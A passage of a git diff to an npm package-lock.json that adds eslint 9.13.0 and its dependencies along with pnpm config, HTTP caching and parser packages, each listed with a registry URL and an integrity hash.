"sha512-fTxvnS1sRMu3+JjXwJG0j/i4RT9u4qJ+lqS/yCGap4lH4zZGzQ7tu+xZqQmcMZq5OBZDL4QRxQzRjkWcGt8IVw==", + "dev": true, + "dependencies": { + "@eslint/object-schema": "^2.1.4", + "debug": "^4.3.1", + "minimatch": "^3.1.2" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/core": { + "version": "0.7.0", + "resolved": "https://registry.npmjs.org/@eslint/core/-/core-0.7.0.tgz", + "integrity": "sha512-xp5Jirz5DyPYlPiKat8jaq0EmYvDXKKpzTbxXMpT9eqlRJkRKIz9AGMdlvYjih+im+QlhWrpvVjl8IPC/lHlUw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/eslintrc": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-3.1.0.tgz", + "integrity": "sha512-4Bfj15dVJdoy3RfZmmo86RK1Fwzn6SstsvK9JS+BaVKqC6QQQQyXekNaC+g+LKNgkQ+2VhGAzm6hO40AhMR3zQ==", + "dev": true, + "dependencies": { + "ajv": "^6.12.4", + "debug": "^4.3.2", + "espree": "^10.0.1", + "globals": "^14.0.0", + "ignore": "^5.2.0", + "import-fresh": "^3.2.1", + "js-yaml": "^4.1.0", + "minimatch": "^3.1.2", + "strip-json-comments": "^3.1.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@eslint/eslintrc/node_modules/ajv": { + "version": "6.12.6", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", + "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "fast-json-stable-stringify": "^2.0.0", + "json-schema-traverse": "^0.4.1", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/@eslint/eslintrc/node_modules/globals": { + "version": "14.0.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-14.0.0.tgz", + "integrity": "sha512-oahGvuMGQlPw/ivIYBjVSrWAfWLBeku5tpPE2fOPLi+WHffIWbuh2tCjhyQhTBPMf5E9jDEH4FOmTYgYwbKwtQ==", + "dev": true, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@eslint/eslintrc/node_modules/json-schema-traverse": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", + "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", + "dev": true + }, + "node_modules/@eslint/js": { + "version": "9.13.0", + "resolved": "https://registry.npmjs.org/@eslint/js/-/js-9.13.0.tgz", + "integrity": "sha512-IFLyoY4d72Z5y/6o/BazFBezupzI/taV8sGumxTAVw3lXG9A6md1Dc34T9s1FoD/an9pJH8RHbAxsaEbBed9lA==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/object-schema": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/@eslint/object-schema/-/object-schema-2.1.4.tgz", + "integrity": "sha512-BsWiH1yFGjXXS2yvrf5LyuoSIIbPrGUWob917o+BTKuZ7qJdxX8aJLRxs1fS9n6r7vESrq1OUqb68dANcFXuQQ==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/plugin-kit": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/@eslint/plugin-kit/-/plugin-kit-0.2.2.tgz", + "integrity": "sha512-CXtq5nR4Su+2I47WPOlWud98Y5Lv8Kyxp2ukhgFx/eW6Blm18VXJO5WuQylPugRo8nbluoi6GvvxBLqHcvqUUw==", + "dev": true, + "dependencies": { + "levn": "^0.4.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/@eslint/plugin-kit/node_modules/levn": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", + "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", + "dev": true, + "dependencies": { + "prelude-ls": "^1.2.1", + "type-check": "~0.4.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/@eslint/plugin-kit/node_modules/prelude-ls": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", + "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", + "dev": true, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/@eslint/plugin-kit/node_modules/type-check": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", + "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", + "dev": true, + "dependencies": { + "prelude-ls": "^1.2.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, "node_modules/@ethereumjs/rlp": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/@ethereumjs/rlp/-/rlp-4.0.1.tgz", @@ -840,6 +1049,54 @@ "node": ">=14" } }, + "node_modules/@humanfs/core": { + "version": "0.19.1", + "resolved": "https://registry.npmjs.org/@humanfs/core/-/core-0.19.1.tgz", + "integrity": "sha512-5DyQ4+1JEUzejeK1JGICcideyfUbGixgS9jNgex5nqkW+cY7WZhxBigmieN5Qnw9ZosSNVC9KQKyb+GUaGyKUA==", + "dev": true, + "engines": { + "node": ">=18.18.0" + } + }, + "node_modules/@humanfs/node": { + "version": "0.16.6", + "resolved": "https://registry.npmjs.org/@humanfs/node/-/node-0.16.6.tgz", + "integrity": "sha512-YuI2ZHQL78Q5HbhDiBA1X4LmYdXCKCMQIfw0pw7piHJwyREFebJUvrQN4cMssyES6x+vfUbx1CIpaQUKYdQZOw==", + "dev": true, + "dependencies": { + "@humanfs/core": "^0.19.1", + "@humanwhocodes/retry": "^0.3.0" + }, + "engines": { + "node": ">=18.18.0" + } + }, + "node_modules/@humanwhocodes/module-importer": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", + "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", + "dev": true, + "engines": { + "node": ">=12.22" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/nzakas" + } + }, + "node_modules/@humanwhocodes/retry": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/@humanwhocodes/retry/-/retry-0.3.1.tgz", + "integrity": "sha512-JBxkERygn7Bv/GbN5Rv8Ul6LVknS+5Bp6RgDC/O8gEBU/yeH5Ui5C/OlWrTb6qct7LjjfT6Re2NxB0ln0yYybA==", + "dev": true, + "engines": { + "node": ">=18.18" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/nzakas" + } + }, "node_modules/@jridgewell/resolve-uri": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", @@ -1666,6 +1923,43 @@ "node": ">= 10" } }, + "node_modules/@pnpm/config.env-replace": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@pnpm/config.env-replace/-/config.env-replace-1.1.0.tgz", + "integrity": "sha512-htyl8TWnKL7K/ESFa1oW2UB5lVDxuF5DpM7tBi6Hu2LNL3mWkIzNLG6N4zoCUP1lCKNxWy/3iu8mS8MvToGd6w==", + "engines": { + "node": ">=12.22.0" + } + }, + "node_modules/@pnpm/network.ca-file": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@pnpm/network.ca-file/-/network.ca-file-1.0.2.tgz", + "integrity": "sha512-YcPQ8a0jwYU9bTdJDpXjMi7Brhkr1mXsXrUJvjqM2mQDgkRiz8jFaQGOdaLxgjtUfQgZhKy/O3cG/YwmgKaxLA==", + "dependencies": { + "graceful-fs": "4.2.10" + }, + "engines": { + "node": ">=12.22.0" + } + }, + "node_modules/@pnpm/network.ca-file/node_modules/graceful-fs": { + "version": "4.2.10", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", + "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==" + }, + "node_modules/@pnpm/npm-conf": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/@pnpm/npm-conf/-/npm-conf-2.3.1.tgz", + "integrity": "sha512-c83qWb22rNRuB0UaVCI0uRPNRr8Z0FWnEIvT47jiHAmOIUHbBOg5XvV7pM5x+rKn9HRpjxquDbXYSXr3fAKFcw==", + "dependencies": { + "@pnpm/config.env-replace": "^1.1.0", + "@pnpm/network.ca-file": "^1.0.1", + "config-chain": "^1.1.11" + }, + "engines": { + "node": ">=12" + } + }, "node_modules/@scure/base": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/@scure/base/-/base-1.1.6.tgz", @@ -1800,6 +2094,17 @@ "node": ">=6" } }, + "node_modules/@sindresorhus/is": { + "version": "5.6.0", + "resolved": "https://registry.npmjs.org/@sindresorhus/is/-/is-5.6.0.tgz", + "integrity": "sha512-TV7t8GKYaJWsn00tFDqBw8+Uqmr8A0fRU1tvTQhyZzGv0sJCGRQL3JGMI3ucuKo3XIZdUP+Lx7/gh2t3lewy7g==", + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sindresorhus/is?sponsor=1" + } + }, "node_modules/@solidity-parser/parser": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/@solidity-parser/parser/-/parser-0.14.5.tgz", @@ -1809,6 +2114,17 @@ "antlr4ts": "^0.5.0-alpha.4" } }, + "node_modules/@szmarczak/http-timer": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/@szmarczak/http-timer/-/http-timer-5.0.1.tgz", + "integrity": "sha512-+PmQX0PiAYPMeVYe237LJAYvOMYW1j2rH5YROyS3b4CTVJum34HfRvKvAzozHAQG0TnHNdUfY9nCeUyRAs//cw==", + "dependencies": { + "defer-to-connect": "^2.0.1" + }, + "engines": { + "node": ">=14.16" + } + }, "node_modules/@tsconfig/node10": { "version": "1.0.11", "resolved": "https://registry.npmjs.org/@tsconfig/node10/-/node10-1.0.11.tgz", @@ -1931,6 +2247,12 @@ "@types/node": "*" } }, + "node_modules/@types/estree": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.6.tgz", + "integrity": "sha512-AYnb1nQyY49te+VRAVgmzfcgjYS91mY5P0TKUDCLEM+gNnA+3T6rWITXRLYCpahpqSQbN5cE+gHpnPyXjHWxcw==", + "dev": true + }, "node_modules/@types/form-data": { "version": "0.0.33", "resolved": "https://registry.npmjs.org/@types/form-data/-/form-data-0.0.33.tgz", @@ -1950,6 +2272,17 @@ "@types/node": "*" } }, + "node_modules/@types/http-cache-semantics": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/@types/http-cache-semantics/-/http-cache-semantics-4.0.4.tgz", + "integrity": "sha512-1m0bIFVc7eJWyve9S0RnuRgcQqF/Xd5QsUZAZeQFr1Q3/p9JWoQQEqmVy+DPTNpGXwhgIetAoYF8JSc33q29QA==" + }, + "node_modules/@types/json-schema": { + "version": "7.0.15", + "resolved": "https://registry.npmjs.org/@types/json-schema/-/json-schema-7.0.15.tgz", + "integrity": "sha512-5+fP8P8MFNC+AyZCDxrB2pkZFPGzqQWUzpSeuuVLvm8VMcorNYavBqoFcxK8bQz4Qsbn4oUEEem4wDLfcysGHA==", + "dev": true + }, "node_modules/@types/lru-cache": { "version": "5.1.1", "resolved": "https://registry.npmjs.org/@types/lru-cache/-/lru-cache-5.1.1.tgz", @@ -2010,10 +2343,9 @@ "peer": true }, "node_modules/acorn": { - "version": "8.11.3", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.11.3.tgz", - "integrity": "sha512-Y9rRfJG5jcKOE0CLisYbojUjIrIEE7AGMzA/Sm4BslANhbS+cDMpgBdcPT91oJ7OuJ9hYJBx59RjbhxVnrF8Xg==", - "peer": true, + "version": "8.14.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.14.0.tgz", + "integrity": "sha512-cl669nCJTZBsL97OF4kUQm5g5hC2uihk0NxY3WENAC0TYdILVkAyHymAntgxGkl7K+t0cXIrH5siy5S4XkFycA==", "bin": { "acorn": "bin/acorn" }, @@ -2021,6 +2353,15 @@ "node": ">=0.4.0" } }, + "node_modules/acorn-jsx": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", + "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", + "dev": true, + "peerDependencies": { + "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" + } + }, "node_modules/acorn-walk": { "version": "8.3.2", "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-8.3.2.tgz", @@ -2071,7 +2412,6 @@ "version": "8.16.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.16.0.tgz", "integrity": "sha512-F0twR8U1ZU67JIEtekUcLkXkoO5mMMmgGD8sK/xUFzJ805jxHQl92hImFAqqXMyMYjSPOyUPAwHYhB72g5sTXw==", - "peer": true, "dependencies": { "fast-deep-equal": "^3.1.3", "json-schema-traverse": "^1.0.0", @@ -2142,6 +2482,14 @@ "node": ">=4" } }, + "node_modules/antlr4": { + "version": "4.13.2", + "resolved": "https://registry.npmjs.org/antlr4/-/antlr4-4.13.2.tgz", + "integrity": "sha512-QiVbZhyy4xAZ17UPEuG3YTOt8ZaoeOR1CvEAqrEsDBsOqINslaB147i9xqljZqoyf5S+EUlGStaj+t22LT9MOg==", + "engines": { + "node": ">=16" + } + }, "node_modules/antlr4ts": { "version": "0.5.0-alpha.4", "resolved": "https://registry.npmjs.org/antlr4ts/-/antlr4ts-0.5.0-alpha.4.tgz", @@ -2213,11 +2561,15 @@ "node": "*" } }, + "node_modules/ast-parents": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/ast-parents/-/ast-parents-0.0.1.tgz", + "integrity": "sha512-XHusKxKz3zoYk1ic8Un640joHbFMhbqneyoZfoKnEGtf2ey9Uh/IdpcQplODdO/kENaMIWsD0nJm4+wX3UNLHA==" + }, "node_modules/astral-regex": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", - "peer": true, "engines": { "node": ">=8" } @@ -2469,6 +2821,31 @@ "node": ">= 0.8" } }, + "node_modules/cacheable-lookup": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/cacheable-lookup/-/cacheable-lookup-7.0.0.tgz", + "integrity": "sha512-+qJyx4xiKra8mZrcwhjMRMUhD5NR1R8esPkzIYxX96JiecFoxAXFuz/GpR3+ev4PE1WamHip78wV0vcmPQtp8w==", + "engines": { + "node": ">=14.16" + } + }, + "node_modules/cacheable-request": { + "version": "10.2.14", + "resolved": "https://registry.npmjs.org/cacheable-request/-/cacheable-request-10.2.14.tgz", + "integrity": "sha512-zkDT5WAF4hSSoUgyfg5tFIxz8XQK+25W/TLVojJTMKBaxevLBBtLxgqguAuVQB8PVW79FVjHcU+GJ9tVbDZ9mQ==", + "dependencies": { + "@types/http-cache-semantics": "^4.0.2", + "get-stream": "^6.0.1", + "http-cache-semantics": "^4.1.1", + "keyv": "^4.5.3", + "mimic-response": "^4.0.0", + "normalize-url": "^8.0.0", + "responselike": "^3.0.0" + }, + "engines": { + "node": ">=14.16" + } + }, "node_modules/call-bind": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/call-bind/-/call-bind-1.0.7.tgz", @@ -2488,6 +2865,14 @@ "url": "https://github.com/sponsors/ljharb" } }, + "node_modules/callsites": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", + "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "engines": { + "node": ">=6" + } + }, "node_modules/camelcase": { "version": "6.3.0", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", @@ -2848,6 +3233,15 @@ "safe-buffer": "~5.1.0" } }, + "node_modules/config-chain": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz", + "integrity": "sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==", + "dependencies": { + "ini": "^1.3.4", + "proto-list": "~1.2.1" + } + }, "node_modules/cookie": { "version": "0.4.2", "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz", @@ -2862,6 +3256,31 @@ "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==", "peer": true }, + "node_modules/cosmiconfig": { + "version": "8.3.6", + "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-8.3.6.tgz", + "integrity": "sha512-kcZ6+W5QzcJ3P1Mt+83OUv/oHFqZHIx8DuxG6eZ5RGMERoLqp4BuGjhHLYGK+Kf5XVkQvqBSmAy/nGWN3qDgEA==", + "dependencies": { + "import-fresh": "^3.3.0", + "js-yaml": "^4.1.0", + "parse-json": "^5.2.0", + "path-type": "^4.0.0" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/d-fischer" + }, + "peerDependencies": { + "typescript": ">=4.9.5" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, "node_modules/create-hash": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/create-hash/-/create-hash-1.2.0.tgz", @@ -2893,6 +3312,35 @@ "integrity": "sha512-dcKFX3jn0MpIaXjisoRvexIJVEKzaq7z2rZKxf+MSr9TkdmHmsU4m2lcLojrj/FHl8mk5VxMmYA+ftRkP/3oKQ==", "peer": true }, + "node_modules/cross-spawn": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", + "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", + "dev": true, + "dependencies": { + "path-key": "^3.1.0", + "shebang-command": "^2.0.0", + "which": "^2.0.1" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/cross-spawn/node_modules/which": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dev": true, + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "node-which": "bin/node-which" + }, + "engines": { + "node": ">= 8" + } + }, "node_modules/crypt": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/crypt/-/crypt-0.0.2.tgz", @@ -2935,6 +3383,31 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/decompress-response": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", + "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", + "dependencies": { + "mimic-response": "^3.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/decompress-response/node_modules/mimic-response": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", + "integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/deep-eql": { "version": "4.1.4", "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-4.1.4.tgz", @@ -2951,7 +3424,6 @@ "version": "0.6.0", "resolved": "https://registry.npmjs.org/deep-extend/-/deep-extend-0.6.0.tgz", "integrity": "sha512-LOHxIOaPYdHlJRtCQfDIVZtfw/ufM8+rVj649RIHzcm/vGwQRXFt6OPqIFWsm2XEMrNIEtWR64sY1LEKD2vAOA==", - "peer": true, "engines": { "node": ">=4.0.0" } @@ -2959,8 +3431,15 @@ "node_modules/deep-is": { "version": "0.1.4", "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", - "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", - "peer": true + "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==" + }, + "node_modules/defer-to-connect": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/defer-to-connect/-/defer-to-connect-2.0.1.tgz", + "integrity": "sha512-4tvttepXG1VaYGrRibk5EwJd1t4udunSOVMdLSAL6mId1ix438oPwPZMALY41FCijukO1L0twNcGsdzS7dHgDg==", + "engines": { + "node": ">=10" + } }, "node_modules/define-data-property": { "version": "1.1.4", @@ -3072,6 +3551,14 @@ "node": ">=6" } }, + "node_modules/error-ex": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", + "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", + "dependencies": { + "is-arrayish": "^0.2.1" + } + }, "node_modules/es-define-property": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.0.tgz", @@ -3144,24 +3631,417 @@ "node": ">=0.8.0" } }, - "node_modules/esprima": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-2.7.3.tgz", - "integrity": "sha512-OarPfz0lFCiW4/AV2Oy1Rp9qu0iusTKqykwTspGCZtPxmF81JR4MmIebvF1F9+UOKth2ZubLQ4XGGaU+hSn99A==", - "peer": true, + "node_modules/eslint": { + "version": "9.13.0", + "resolved": "https://registry.npmjs.org/eslint/-/eslint-9.13.0.tgz", + "integrity": "sha512-EYZK6SX6zjFHST/HRytOdA/zE72Cq/bfw45LSyuwrdvcclb/gqV8RRQxywOBEWO2+WDpva6UZa4CcDeJKzUCFA==", + "dev": true, + "dependencies": { + "@eslint-community/eslint-utils": "^4.2.0", + "@eslint-community/regexpp": "^4.11.0", + "@eslint/config-array": "^0.18.0", + "@eslint/core": "^0.7.0", + "@eslint/eslintrc": "^3.1.0", + "@eslint/js": "9.13.0", + "@eslint/plugin-kit": "^0.2.0", + "@humanfs/node": "^0.16.5", + "@humanwhocodes/module-importer": "^1.0.1", + "@humanwhocodes/retry": "^0.3.1", + "@types/estree": "^1.0.6", + "@types/json-schema": "^7.0.15", + "ajv": "^6.12.4", + "chalk": "^4.0.0", + "cross-spawn": "^7.0.2", + "debug": "^4.3.2", + "escape-string-regexp": "^4.0.0", + "eslint-scope": "^8.1.0", + "eslint-visitor-keys": "^4.1.0", + "espree": "^10.2.0", + "esquery": "^1.5.0", + "esutils": "^2.0.2", + "fast-deep-equal": "^3.1.3", + "file-entry-cache": "^8.0.0", + "find-up": "^5.0.0", + "glob-parent": "^6.0.2", + "ignore": "^5.2.0", + "imurmurhash": "^0.1.4", + "is-glob": "^4.0.0", + "json-stable-stringify-without-jsonify": "^1.0.1", + "lodash.merge": "^4.6.2", + "minimatch": "^3.1.2", + "natural-compare": "^1.4.0", + "optionator": "^0.9.3", + "text-table": "^0.2.0" + }, "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" + "eslint": "bin/eslint.js" }, "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/estraverse": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-1.9.3.tgz", - "integrity": "sha512-25w1fMXQrGdoquWnScXZGckOv+Wes+JDnuN/+7ex3SauFRS72r2lFDec0EKPt2YD1wUJ/IrfEex+9yp4hfSOJA==", - "peer": true, + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://eslint.org/donate" + }, + "peerDependencies": { + "jiti": "*" + }, + "peerDependenciesMeta": { + "jiti": { + "optional": true + } + } + }, + "node_modules/eslint-scope": { + "version": "8.2.0", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-8.2.0.tgz", + "integrity": "sha512-PHlWUfG6lvPc3yvP5A4PNyBL1W8fkDUccmI21JUu/+GKZBoH/W5u6usENXUrWFRsyoW5ACUjFGgAFQp5gUlb/A==", + "dev": true, + "dependencies": { + "esrecurse": "^4.3.0", + "estraverse": "^5.2.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint-scope/node_modules/estraverse": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", + "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", + "dev": true, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/eslint-visitor-keys": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-4.2.0.tgz", + "integrity": "sha512-UyLnSehNt62FFhSwjZlHmeokpRK59rcz29j+F1/aDgbkbRTk7wIc9XzdoasMUbRNKDM0qQt/+BJ4BrpFeABemw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint/node_modules/ajv": { + "version": "6.12.6", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", + "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "fast-json-stable-stringify": "^2.0.0", + "json-schema-traverse": "^0.4.1", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/eslint/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/eslint/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/eslint/node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, + "dependencies": { + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" + } + }, + "node_modules/eslint/node_modules/color-name": { + "version": 